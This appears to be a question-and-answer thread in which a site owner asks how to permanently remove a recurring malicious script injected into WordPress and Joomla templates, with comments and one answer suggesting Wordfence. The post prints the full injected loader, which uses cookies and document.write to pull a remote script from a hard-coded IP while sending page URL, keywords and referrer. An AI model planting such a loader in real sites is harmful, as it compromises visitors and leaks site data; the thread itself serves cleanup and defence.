# Malware JavaScript jQuery injected in WordPress & Joomla

Tags: javascript, php, jquery, security, malware

Recently I noticed a JavaScript injected in the website templates (header.php in case of WordPress and index.php in Joomla). The malware is noted on [this site](https://aw-snap.info/articles/malware-of-the-day.php) (September 23, 2016 entry), but without any advice on how to get rid of it, as removing it every time it shows up is not a real solution.

The script keeps coming back, even after following the general advice like [here](https://productforums.google.com/forum/#!topic/webmasters/9ykO3vg9Mas;context-place=topicsearchin/webmasters/category$3A(malware--hacked-sites)). Even when (js) pasted in google search a lot of websites pop-up as affected. The files are owned by www-data. I gues, what I am asking is - is there a more permanent solution? Here is the script (it is injected as one long line, but I tidied it up:

```
<script>
 var a = '';
  setTimeout(1);

  function setCookie(a, b, c) {
    var d = new Date;
    d.setTime(d.getTime() + 60 * c * 60 * 1e3);
    var e = "expires=" + d.toUTCString();
    document.cookie = a + "=" + b + "; " + e
  }

  function getCookie(a) {
    for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
      for (var e = c[d];
        " " == e.charAt(0);) e = e.substring(1);
      if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
    }
    return null
  }
  null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 == getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write('<script type="text/javascript" src="' + 'http://216.15.220.176/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k = (function() {
    var keywords = '';
    var metas = document.getElementsByTagName('meta');
    if (metas) {
      for (var x = 0, y = metas.length; x < y; x++) {
        if (metas[x].name.toLowerCase() == "keywords") {
          keywords += metas[x].content;
        }
      }
    }
    return keywords !== '' ? keywords : null;
  })()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));

</script>
```

Comment: Did you search in your database for the given Script?

Comment: @tim-s - I searched the database for parts of the code but to no avail. I should note that I resolved the problem by changing the ownership of the files and directories in Joomla&WordPress, but some functionality - like editing templates and parts of the site that are non-dependent on MySQL.

Comment: Was only guessing - I am not so experienced in wordpress...

Comment: Well - It was something I didn't try before you suggested it :-)

Answer (score -2):

You should install a plugin like [wordfence](https://wordpress.org/plugins/wordfence/). It checks all plugins and theme files and sends alerts if a file has been updated.